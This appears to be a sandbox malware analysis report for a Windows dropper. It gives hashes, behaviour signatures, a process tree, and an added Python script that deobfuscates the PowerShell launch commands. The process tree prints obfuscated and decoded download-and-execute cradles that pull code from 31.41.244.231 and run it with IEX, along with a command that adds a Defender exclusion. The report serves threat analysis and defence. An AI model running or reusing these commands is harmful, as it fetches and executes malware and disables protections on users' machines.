Analysis
- max time kernel: 117s
- max time network: 132s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 12/09/2022, 19:56
Behavioral tasks
- behavioral1: sample 3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe, resource win7-20220901-en
- behavioral2: sample 3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe, resource win10v2004-20220812-en
- behavioral3: sample out.exe, resource win7-20220812-en
- behavioral4: sample out.exe, resource win10v2004-20220812-en

The signatures, process tree and downloads below belong to the behavioral2 run (Windows 10 2004 x64, resource win10v2004-20220812-en): the Analysis metadata names that platform and the memory-dump YARA matches are tagged behavioral2/.
General
- Target: 3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe
- Size: 979KB
- MD5: c13f1a8cf97ee2f8c3c782e7e8bb717f
- SHA1: 02c0218bca2ce9801860b1b0793d8631d09b9933
- SHA256: 3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea
- SHA512: 79073289d8e9b902cbbb895164b7c1e06f18a8367d339b3f3d681170306882de436bcdb9eb3b73c69d4869e40f98138ad8b0d89e1709d2158dfef028b92b4f08
- SSDEEP: 24576:gYrxUgRM5Ybc9bKvu6DPiCskNxZsTB3O6vJV9XKEYoSNd64X:g1Cgb+DPitklsTB3vJLXY5Nd6q
Malware Config
Extracted URLs (the second-stage download locations used by the PowerShell cradles in the process tree):
- http://31.41.244.231/AVAVA/WAW/APPDATA/go.oo
- http://31.41.244.231/AVAVA/WAW/Documents/go.oo
Signatures
- Blocklisted process makes network request (2 IoCs)
  flow 28: pid 3916 powershell.exe
  flow 29: pid 1988 powershell.exe
- Executes dropped EXE (1 IoC)
  pid 3116 Offer.exe
- YARA rule match: upx (2 memory dumps of the initial process)
  behavioral2/memory/1368-132-0x0000000000400000-0x0000000000434000-memory.dmp
  behavioral2/memory/1368-133-0x0000000000400000-0x0000000000434000-memory.dmp
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation, by 3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe
  Key value queried: \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation, by Offer.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  (This is the sandbox's generic description for the signature; no file-encryption activity is reported anywhere else in this run.)
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid 3916 powershell.exe, pid 1988 powershell.exe, pid 3836 powershell.exe (each reported twice)
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token SeDebugPrivilege: pid 3836 powershell.exe; pid 3916 powershell.exe; pid 1988 powershell.exe
- Suspicious use of SetWindowsHookEx (1 IoC)
  pid 3116 Offer.exe
- Suspicious use of WriteProcessMemory (14 IoCs; "PID A wrote to memory of B", with the sandbox's procid_target)
  1368 -> 3060  3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe  procid_target 87  (reported 2 times)
  1368 -> 3116  3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe  procid_target 89  (reported 3 times)
  3116 -> 3836  Offer.exe  procid_target 90  (reported 3 times)
  3116 -> 1988  Offer.exe  procid_target 92  (reported 3 times)
  3116 -> 3916  Offer.exe  procid_target 94  (reported 3 times)
  These writes line up with the parent/child pairs in the process tree; each is the parent writing into a child it has just created.
Processes
1. C:\Users\Admin\AppData\Local\Temp\3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe (PID 1368)
   Command line: "C:\Users\Admin\AppData\Local\Temp\3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe"
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\cmd.exe (PID 3060)
      Command line: "C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Roaming\Offs\KillDuplicate.cmd" "C:\Users\Admin\AppData\Roaming\Offs" "3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe""
      Runs a dropped batch file, KillDuplicate.cmd, passing the drop directory and the original sample's file name as arguments. The batch file's contents are not shown in the report.

   2. C:\Users\Admin\AppData\Roaming\Offs\Offer.exe (PID 3116)
      Command line: "C:\Users\Admin\AppData\Roaming\Offs\Offer.exe"
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      Each of the three PowerShell children below has the image path C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe although its command line names C:\Windows\System32\...: Offer.exe is a 32-bit process, so WoW64 file-system redirection maps System32 to SysWOW64 and the 32-bit PowerShell host is what actually runs.

      3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3836)
         Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAJwAgACAALQBGAG8AcgBjAGUAOwA=
         Decoded -enc argument (base64 of a UTF-16LE string; decoded here, the sandbox does not show it):
           Add-MpPreference -ExclusionPath $env:USERPROFILE'\AppData\Roaming'  -Force;
         This adds a Microsoft Defender exclusion for the user's Roaming AppData directory, the directory Offer.exe was dropped into, before the two download stages run.
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken

      3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1988)
         Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{BINGO}(N{BINGO}{BINGO}e{BINGO}w-{BINGO}Ob{BINGO}{BINGO}je{BINGO}{BINGO}c{BINGO}t N{BINGO}{BINGO}e{BINGO}t.W{BINGO}e';$c4='b{BINGO}{BINGO}Cli{BINGO}{BINGO}en{BINGO}{BINGO}t{BINGO}).Do{BINGO}{BINGO}wn{BINGO}{BINGO}l{BINGO}o';$c3='a{BINGO}dS{BINGO}{BINGO}t{BINGO}ri{BINGO}{BINGO}n{BINGO}g{BINGO}(''h{BINGO}tt{BINGO}p:/{BINGO}/31.41.244.231/AVAVA/WAW/APPDATA/go.oo''){BINGO}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{BINGO}',''); IEX $TC |IEX
         After the three fragments are joined and the {BINGO} junk token is removed, $TC is:
           (New-Object Net.WebClient).DownloadString('http://31.41.244.231/AVAVA/WAW/APPDATA/go.oo')
         The first IEX evaluates that string, which performs the download and returns the response body; the second IEX executes whatever was downloaded.
         - Blocklisted process makes network request
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken

      3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3916)
         Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{BINGO}(N{BINGO}{BINGO}e{BINGO}w-{BINGO}Ob{BINGO}{BINGO}je{BINGO}{BINGO}c{BINGO}t N{BINGO}{BINGO}e{BINGO}t.W{BINGO}e';$c4='b{BINGO}{BINGO}Cli{BINGO}{BINGO}en{BINGO}{BINGO}t{BINGO}).Do{BINGO}{BINGO}wn{BINGO}{BINGO}l{BINGO}o';$c3='a{BINGO}dS{BINGO}{BINGO}t{BINGO}ri{BINGO}{BINGO}n{BINGO}g{BINGO}(''h{BINGO}tt{BINGO}p:/{BINGO}/31.41.244.231/AVAVA/WAW/Documents/go.oo''){BINGO}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{BINGO}',''); IEX $TC |IEX
         Same cradle as PID 1988; after deobfuscation $TC is:
           (New-Object Net.WebClient).DownloadString('http://31.41.244.231/AVAVA/WAW/Documents/go.oo')
         - Blocklisted process makes network request
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
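The two obfuscation styles in the process tree (the -enc base64/UTF-16LE form used for the Defender exclusion, and the fragment-join-plus-.replace() form used for the download cradles) are mechanical to undo. The following Python script is an added example, not part of the tria.ge report or of the sample: it takes the command lines exactly as the process tree lists them (copied into the script as constants), recovers the plain script behind each, and pulls out the URLs and the suspicious cmdlets/methods an analyst would record as IoCs. The regular expressions and the keyword list are this example's own assumptions, not anything the sandbox uses.

```python
"""Deobfuscate the PowerShell launch styles seen in the process tree.

Added example, not part of the tria.ge report or of the sample: the two
command lines below are copied from the PID 3836 and PID 1988 entries above.
"""
import base64
import re

# Copied from the PID 3836 entry: -enc carries base64 of a UTF-16LE script.
ENCODED_CMDLINE = (
    "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -enc "
    "IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAJwAgACAALQBGAG8AcgBjAGUAOwA="
)

# Copied from the PID 1988 entry: string fragments are joined and a junk
# token ({BINGO}) is stripped at run time before two nested IEX calls.
JUNK_CMDLINE = (
    "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" "
    "$c1='{BINGO}(N{BINGO}{BINGO}e{BINGO}w-{BINGO}Ob{BINGO}{BINGO}je{BINGO}{BINGO}c{BINGO}t "
    "N{BINGO}{BINGO}e{BINGO}t.W{BINGO}e';"
    "$c4='b{BINGO}{BINGO}Cli{BINGO}{BINGO}en{BINGO}{BINGO}t{BINGO}).Do{BINGO}{BINGO}wn{BINGO}{BINGO}l{BINGO}o';"
    "$c3='a{BINGO}dS{BINGO}{BINGO}t{BINGO}ri{BINGO}{BINGO}n{BINGO}g{BINGO}(''h{BINGO}tt{BINGO}p:/{BINGO}"
    "/31.41.244.231/AVAVA/WAW/APPDATA/go.oo''){BINGO}';"
    "$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{BINGO}',''); IEX $TC |IEX"
)

# Assumed patterns (this example's own). PowerShell single-quoted literal:
# the only escape sequence inside it is '' -> '.
STRING_RE = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'")
JOIN_RE = re.compile(r"\(\s*((?:\$\w+\s*,\s*)+\$\w+)\s+-join\s+''\s*\)", re.I)
REPLACE_RE = re.compile(r"\.replace\(\s*'((?:[^']|'')*)'\s*,\s*''\s*\)", re.I)
URL_RE = re.compile(r"""https?://[^\s'"()<>]+""")
KEYWORD_RE = re.compile(
    r"\b(add-mppreference|downloadstring|iex|invoke-expression|net\.webclient)\b", re.I)


def unquote(literal):
    """Undo the '' escape of a PowerShell single-quoted string body."""
    return literal.replace("''", "'")


def decode_encoded_command(cmdline):
    """Return the script behind -e/-ec/-enc/-EncodedCommand, or None.

    PowerShell accepts any unambiguous prefix of -EncodedCommand, so the
    flag is matched as a prefix rather than as a fixed spelling.
    """
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        name = flag.lstrip("-/").lower()
        if flag[0] in "-/" and name and "encodedcommand".startswith(name):
            padded = value + "=" * (-len(value) % 4)   # tolerate stripped padding
            return base64.b64decode(padded).decode("utf-16-le")
    return None


def decode_junk_join(cmdline):
    """Rebuild the string assembled by ($a,$b,... -Join '') and then cleaned
    with .replace('<junk>',''); None if that pattern is absent."""
    join = JOIN_RE.search(cmdline)
    if not join:
        return None
    fragments = {name: unquote(body) for name, body in STRING_RE.findall(cmdline)}
    order = [v.strip().lstrip("$") for v in join.group(1).split(",")]
    if any(name not in fragments for name in order):
        return None
    script = "".join(fragments[name] for name in order)
    for junk in REPLACE_RE.findall(cmdline):
        script = script.replace(unquote(junk), "")
    return script


def triage(cmdline):
    """Decode one PowerShell command line and return the plain script, the
    URLs it contains, and the suspicious cmdlets/methods it or its launcher
    use (keywords are this example's own short list)."""
    script = decode_encoded_command(cmdline) or decode_junk_join(cmdline) or cmdline
    hits = []
    for match in KEYWORD_RE.findall(script + " " + cmdline):
        if match.lower() not in hits:
            hits.append(match.lower())
    return {"script": script.strip(), "urls": URL_RE.findall(script), "hits": hits}


if __name__ == "__main__":
    for cmdline in (ENCODED_CMDLINE, JUNK_CMDLINE):
        result = triage(cmdline)
        print(result["script"])
        print("  urls:", result["urls"], "hits:", result["hits"])
```

The keyword hits are deliberately checked against both the decoded script and the raw command line: in the junk-token form the download cradle only appears after deobfuscation, while the two IEX calls that make it dangerous are only visible in the launcher. Feeding the PID 3916 command line through the same function yields the /Documents/go.oo URL.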
Network
MITRE ATT&CK Enterprise v6
Downloads
- 2KB
  MD5: 968cb9309758126772781b83adb8a28f
  SHA1: 8da30e71accf186b2ba11da1797cf67f8f78b47c
  SHA256: 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
  SHA512: 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
- 18KB
  MD5: 21b2515b8ce8a500003c74edc982a17b
  SHA1: 17edc69d4cf122da08d0dd7582626ae2379d4c60
  SHA256: df4a9df4b79a2f364b99f24f682e0b9cd96ed7c93a56805bfd0dfd5d1330f66f
  SHA512: 97b9c3766126f2c5ac28554b880ffdeddc9eebfff903101c25ca58bcbce0b0e17a7e5fc15804ef2064a67b5dd009c3b339bd9bf9f9b56f591876d920a5d4320c
- 18KB
  MD5: 0b9b16e9ebb1c0f5a966ce4840d8a694
  SHA1: ed21e94ad30fc5177d1c34a7411ef3d43b1096a9
  SHA256: 6ada979d402c17a05fe93c3c17c2a5e692214fa2bb6a7938db35d47b062946cb
  SHA512: ef6ad9aa5820c216879818461719da49d8f49b581a83b83b61def1a320ee219e3d760fc1390dc93e1492cf98ddf9cc7a449b766855e0f64c19b2e8fd3031b7dc
- 7KB (listed twice in the report with identical hashes)
  MD5: fa4300da126da4a4ecf2c0d82dbe92f4
  SHA1: 3acbae61f796e7fad05ee9a875a9d3cbd6ec3996
  SHA256: 1ddbf6cb9e4c92e93118d8f2ca98922195cf683926777b2c160f5d05d52f3fd5
  SHA512: d6922c07a9fc04d7c24ffdafd77651996224581b41f2d063a25d5fe1b786a89cf04b88447924f6fe11e9766b08ac97b1f50144a29c1d89d8198b68262c1ae6c9